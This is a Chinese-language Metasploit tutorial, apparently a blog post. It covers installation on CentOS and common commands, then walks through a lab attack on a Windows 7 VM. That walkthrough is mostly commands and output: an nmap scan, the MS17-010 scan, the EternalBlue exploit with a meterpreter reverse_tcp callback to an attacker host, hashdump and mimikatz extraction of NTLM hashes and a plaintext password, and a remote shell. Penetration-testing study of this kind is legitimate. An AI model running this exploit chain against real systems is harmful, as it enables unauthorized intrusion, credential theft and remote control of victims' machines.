Metasploit
一、centos安装metasploit
#下载安装metasploit curl "https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb" > msfinstall && chmod 755 msfinstall && ./msfinstall #安装pg数据库 yum install postgresql -y #初始化数据库 cd /opt/metasploit-framework/embedded/framework/config/ mv database.yml.example database.yml cd ../bin/ #穿件msf数据库用户 useradd msf su msf sh msfdb init cp /home/msf/.msf4/database.yml /opt/metasploit-framework/embedded/framework/config/ cd #进入 msfconsole
二、常用命令
show exploits – 查看所有可用的渗透攻击程序代码 show auxiliary – 查看所有可用的辅助攻击工具 show options – 查看该模块所有可用选项 show payloads – 查看该模块适用的所有载荷代码 show targets – 查看该模块适用的攻击目标类型 search – 根据关键字搜索某模块 info – 显示某模块的详细信息 use – 进入使用某渗透攻击模块 back – 回退 set/unset – 设置/禁用模块中的某个参数 setg/unsetg – 设置/禁用适用于所有模块的全局参数 save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用
三、尝试渗透测试
简述:本次测试将使用windows7的(MS17-010缓冲区溢出)漏洞进行渗透测试
流程:
1、探查目标系统版本和端口
2、漏洞扫描
3、漏洞利用
4、获取密码&获得shell&远程桌面等。。。。
名词介绍:
exploit:是拿下系统前进行的活动,目标是拿下目标系统;
payload:是在拿下目标系统后所进行的操作,目标是提升权限、加强控制等操作,属于后渗透测试。
1 端口扫描系统探查
[root@localhost ~]# nmap -sV 192.168.110.128 Starting Nmap 6.40 ( http://nmap.org ) at 2020-03-31 16:13 CST Nmap scan report for 192.168.110.128 Host is up (0.00091s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open netbios-ssn 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) MAC Address: 00:0C:29:FA:1E:07 (VMware) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds [root@localhost ~]# msfconsole
2 漏洞扫描
msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.110.128 RHOSTS => 192.168.110.128 msf5 auxiliary(scanner/smb/smb_ms17_010) > run [+] 192.168.110.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit) [*] 192.168.110.128:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
3 exploit漏洞利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.110.128 RHOSTS => 192.168.110.128 msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.110.100 LHOST => 192.168.110.100 msf5 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.110.100:4444 [*] 192.168.110.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.110.128:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit) [*] 192.168.110.128:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.110.128:445 - Connecting to target for exploitation. [+] 192.168.110.128:445 - Connection established for exploitation. [+] 192.168.110.128:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.110.128:445 - CORE raw buffer dump (25 bytes) [*] 192.168.110.128:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp [*] 192.168.110.128:445 - 0x00000010 72 69 73 65 20 37 36 30 30 rise 7600 [+] 192.168.110.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.110.128:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.110.128:445 - Sending all but last fragment of exploit packet [*] 192.168.110.128:445 - Starting non-paged pool grooming [+] 192.168.110.128:445 - Sending SMBv2 buffers [+] 192.168.110.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.110.128:445 - Sending final SMBv2 buffers. [*] 192.168.110.128:445 - Sending last fragment of exploit packet! [*] 192.168.110.128:445 - Receiving response from exploit packet [+] 192.168.110.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.110.128:445 - Sending egg to corrupted connection. [*] 192.168.110.128:445 - Triggering free of corrupted buffer. [*] Sending stage (206403 bytes) to 192.168.110.128 [*] Meterpreter session 1 opened (192.168.110.100:4444 -> 192.168.110.128:49455) at 2020-03-31 16:25:08 +0800 [+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.110.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > sysinfo Computer : shwang-PC OS : Windows 7 (6.1 Build 7600). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows
4 获取密码&远程shell
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:12d35f0721a3dbd4c76641e4112a2045::: shwang:1001:aad3b435b51404eeaad3b435b51404ee:3e126da93e034356d4e8cc3e0dd24357::: meterpreter > load mimikatz Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7600).). Did you mean to 'load kiwi' instead? Success. meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;303795 NTLM shwang-PC shwang lm{ 2efa20e3ab44ec3048d7645cd4e30c86 }, ntlm{ 3e126da93e034356d4e8cc3e0dd24357 } 0;291907 NTLM shwang-PC shwang lm{ 2efa20e3ab44ec3048d7645cd4e30c86 }, ntlm{ 3e126da93e034356d4e8cc3e0dd24357 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;996 Negotiate WORKGROUP WIN-862M07A16T1$ n.s. (Credentials KO) 0;49422 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WIN-862M07A16T1$ n.s. (Credentials KO) meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP WIN-862M07A16T1$ 0;49422 NTLM 0;999 NTLM WORKGROUP WIN-862M07A16T1$ 0;303795 NTLM shwang-PC shwang adminadmin 0;291907 NTLM shwang-PC shwang adminadmin
meterpreter > shell
Process 3388 created.
Channel 1 created.
Microsoft Windows [ 6.1.7600]
(c) 2009 Microsoft Corporation
C:\Windows\system32>dir
